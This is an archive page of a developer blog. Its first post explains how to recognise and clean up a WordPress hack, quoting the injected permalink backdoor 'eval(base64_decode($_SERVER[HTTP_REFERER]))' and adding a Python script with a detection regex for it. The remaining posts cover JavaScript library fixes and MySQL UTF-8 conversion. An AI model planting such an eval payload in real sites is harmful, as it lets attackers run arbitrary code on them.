Archive for the ‘Development’ Category

What to do if your blog was hacked by evil eval

Saturday, September 5th, 2009

Weird things happen. Mostly in WordPress. One morning you see that your permalinks have become something like this:

blah/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Or this:

/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Or your feed craps out like this:

error on line 22 at column 71: xmlParseEntityRef: no name wordpress

Do not panic – you’re hacked. And there are three steps to get rid of it.

1) Restore your permalinks
Go to Admin panel -> Settings -> Permalinks.
Set your permalink structure to whatever it was earlier. If you can’t even remember what it was – you can always ask Google for it – just like this: site:yourblogurl.com – and you’ll see the answer in the links to your site.

2) Kill the intruder(s)
Go to your preferred MySQL administration tool (say, MySqlAdmin) and run this code in the SQL window:

SELECT * FROM `wp_usermeta`
WHERE `meta_value` LIKE '%script%'

You’ll see the list of records; write down the user_ids of those guys.
Go to Admin panel -> Users -> Authors & Users and copy the edit link for any user; it’ll be something like:

http://yourblogurl.com/wp-admin/user-edit.php?user_id=14&wp_http_referer=%2Fwp-admin%2Fusers.php

Then paste it into the address bar and change user_id=XX to the first user_id you wrote down. Go.
Replace First name with whatever you want (for example “z”), insert “motherfncker@test.com” into the Email field (or whatever, but remember it, you’ll need it later) and set the Role to Subscriber. Push Update user. Then repeat with the next one in your user_ids list. After you’ve finished, just type the word “motherfncker” (or whatever you set the emails to) into the search box. Now – just delete the bastards!

3) Defend the base
Just upgrade your WordPress. If you do it periodically – there will be no such problems at all!

If you are not able to use an SQL tool – you can try to find the bastards blind:
Go to Admin panel -> Users -> Authors & Users
Note the number of Admin users (right under the “Users” header). One of them is you, all the others – bastard ones :)
Try to find the max. user_id in the list by hovering your mouse over the links. Then copy the edit link of the user with the topmost ID, insert it into the address bar, change it to the next number and go. Did not work? Try the next number. Or the previous one. You can even loop through all the IDs not in use. And when you find him – you know what to do!
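An added triage example, not part of the original post: it checks exported permalink_structure values for the eval/base64_decode payload (raw or percent-encoded) and flags wp_usermeta rows the way steps 2 and the "blind" method above do. The function names, the known_admin_ids parameter and all sample rows are constructed for illustration; the third sample permalink is a constructed variant with its parentheses percent-encoded.

```python
import re
from urllib.parse import unquote

# Payload shape shown in the post's hijacked permalink examples.
INJECTED_PHP = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)

def is_injected_permalink(structure):
    """True if a permalink_structure value carries the eval/base64_decode
    payload, written raw or percent-encoded (%7B, %5B, %28 ...)."""
    return any(INJECTED_PHP.search(s) for s in (structure, unquote(structure)))

def suspicious_users(usermeta_rows, known_admin_ids):
    """usermeta_rows: (user_id, meta_key, meta_value) tuples from wp_usermeta.
    Returns {user_id: sorted reasons} for rows the post's cleanup targets."""
    flagged = {}
    for user_id, meta_key, meta_value in usermeta_rows:
        value = meta_value or ""
        # Same broad test as the post's LIKE '%script%'; review hits by hand.
        if "script" in value.lower():
            flagged.setdefault(user_id, set()).add("script in " + meta_key)
        # Roles live in the <table prefix>capabilities key as a serialized array.
        if (meta_key.endswith("capabilities") and '"administrator"' in value
                and user_id not in known_admin_ids):
            flagged.setdefault(user_id, set()).add("unexpected administrator")
    return {uid: sorted(reasons) for uid, reasons in flagged.items()}

# Constructed sample data (not from a real site).
PERMALINKS = [
    "/%year%/%monthnum%/%postname%/",
    "/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/",
    "/%&(%7B$%7Beval%28base64_decode%28$_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%",
]
USERMETA = [
    (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (2, "wp_capabilities", 'a:1:{s:10:"subscriber";b:1;}'),
    (14, "first_name", "<script>/* constructed placeholder */</script>"),
    (14, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
]

if __name__ == "__main__":
    for p in PERMALINKS:
        print("INJECTED" if is_injected_permalink(p) else "ok      ", p)
    for uid, reasons in suspicious_users(USERMETA, known_admin_ids={1}).items():
        print("user_id", uid, "->", ", ".join(reasons))
```

Pass your own administrator IDs as known_admin_ids; every other account holding the administrator role is reported for review.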


Advanced Scriptaculous Sortable Demo Fix

Monday, April 20th, 2009

Heh.

There is a good example of using nested Scriptaculous Sortables. With one little flaw – Scriptaculous ver 1.6.x is used, and when you try to execute the code with a newer version of the library, a “sections.each is not a function” error pops up.

Here is the way to fix it – you’ll probably need it if you want to save the results :-D

Just replace “document.getElementsByClassName('section');” with “$$('.section');”

Before

function getGroupOrder() {
	var sections = document.getElementsByClassName('section');
	var alerttext = '';
	sections.each(function(section) {
		var sectionID = section.id;
		var order = Sortable.serialize(sectionID);
		alerttext += sectionID + ': ' + Sortable.sequence(section) + '\n';
	});
	alert(alerttext);
	return false;
}

After

function getGroupOrder() {
	var sections = $$('.section');
	var alerttext = '';
	sections.each(function(section) {
		var sectionID = section.id;
		var order = Sortable.serialize(sectionID);
		alerttext += sectionID + ': ' + Sortable.sequence(section) + '\n';
	});
	alert(alerttext);
	return false;
}

Then modify it for your needs and go on )

What was that?
Quote:

As of Prototype 1.6, document.getElementsByClassName has been deprecated since native implementations return a NodeList rather than an Array.


Fixed BoxOver js library

Wednesday, May 28th, 2008

Hi there, my dear java-damned-script fans!

Today I found a strange bug in a pretty little fine-looking hints library called BoxOver, from here. As you know, for the chars ", [ and ] with this library you must use ", [[ and ]] to display… It works, but only once for brackets.

So, I tried to find a fix… None found. At the forum some guy gave an ugly fix with &rbr; and so on…

Shame on you guys, have you ever heard of regexp syntax? ;)

Here’s the BoxOver library with fixed [ and ] brackets display:

Download BoxOver 2.1a javascript library (28th May 2008)

BTW, when I tried to register on the forum to post my fix – I couldn’t – because of the captcha insult, and that’s why I posted it here.


User agent switcher

Wednesday, May 7th, 2008

Helpful thing (for web developer)

Firefox plugin User Agent Switcher 

But check out Safari 3.1 for Windows. Preferences => Advanced tab, enable the Develop menu and – voila! – you have all you want and many more things. Actually it reminded me of the Firebug extension for Firefox.

Enjoy ;)


Wanna buy a PLIGG?

Tuesday, August 21st, 2007

Pligg is now for sale. Do you wanna buy it? Sale includes the pligg.com domain along with all web content created for the site including graphic design work, blog and forum administrator accounts, rights to the Sourceforge.net account. You can buy it here.

Shit.


Are you a web developer for real?

Friday, July 20th, 2007

Just a simple test.

Check this out.

If all you see – is your browser’s “not found” page – well, bad luck! All others – welcome to the club!


Scrap

Tuesday, June 26th, 2007

Hmmmm…
The previous piece of code is scrap if you have to deal with a MySQL 4 server with all defaults.
So… I continued my challenge – I want my data back (and workin’) ;)
Stay tuned for next round…

P.S. For MySql5 all works great…


UTF-8 fix – when charset is set to Latin1

Saturday, June 23rd, 2007

Situation: you have a MySQL 5 database with tables which claim to have the Latin1 charset. You filled the base (with MySQL Front, PhpMyAdmin or any other tool) with info. There ARE non-alnum chars (like TM, (c), long –, ellipsis etc.)

Now you want it back, and your pages are utf-8 encoded, but when you query the base, a ‘?’ sign is returned instead of your cute symbols. Shit.

Never mind, if you can see those chars with PhpMyAdmin – I’ll help you to convert them so you can use them.

First, mysql5 seems to be a utf-8 lover (even if another charset is claimed). So – it’s simple. Just exec SET NAMES utf8 right after database initialisation.

Second, query all the data you need into an array.

Third, just do utf8_encode on the data with your loved scrap

Fourth, exec SET NAMES latin1

Fifth – write your data back

Sixth – tell your application to use utf8_decode when reading and utf8_encode when writing that data.

That’s all – now you can easily transfer your data to MySQL4* or MySQL5 servers – and your app will work there!

Example:

// init skipped

/***********************************
 * Database connect
 **********************************/
$o_db = new myDB(DB::connect(DB_DSN));
$o_db->db_setFetchMode(DB_FETCHMODE_ASSOC);
// Read the rows through a utf8 connection
$o_db->db_query('SET NAMES utf8');

$q = 'SELECT page_id, page_head_title, page_head_description, page_head_keywords
  FROM '.DB_PREFIX.'pages
';
// Fetch all rows of $q into $page. db_getAll() is an assumed wrapper method
// (modelled on PEAR DB's getAll()); the original listing skips this step.
$page = $o_db->db_getAll($q);

// Re-encode every text field
foreach ($page as $k => $p)
  foreach (array('page_head_title', 'page_head_description', 'page_head_keywords') as $field)
    $page[$k][$field] = utf8_encode($p[$field]);

// Write the rows back through a latin1 connection
$o_db->db_query('SET NAMES latin1');

foreach ($page as $p)
{
  // No comma after the last SET assignment, otherwise the UPDATE is a syntax error
  $up = 'UPDATE '.DB_PREFIX.'pages
    SET
    page_head_title = '.$o_db->db_quote($p['page_head_title']).',
    page_head_description = '.$o_db->db_quote($p['page_head_description']).',
    page_head_keywords = '.$o_db->db_quote($p['page_head_keywords']).'
    WHERE page_id = '.$o_db->db_quote($p['page_id']).'
  ';
  $o_db->db_query($up);
}

*see next post


WordPress 2.2.1

Friday, June 22nd, 2007

Oops, WordPress 2.2.1 is out, and I’m still not ready!

Ok, I upgraded all the blogs with my plugs, and let’s see what happens.


Developers versus clients

Monday, June 4th, 2007

Why do they always think that coding is an instant process?

Just another little quote:

We were under the understanding that coding would have been complete and we were to have seen your work late last week

Yeah, right. Do you mean next week?


PHP 4 and XML

Thursday, May 31st, 2007

What a mess.

PHP 4 had no human-usable XML handling implementation.
And almost all the libraries are a mess…

I found one good article about it, but it’s in Russian.
OK, I’ll try to translate it later (maybe only examples)

And as for me – I found what I wanted. Small and effective library.

Here it is, under the more tag

(more…)
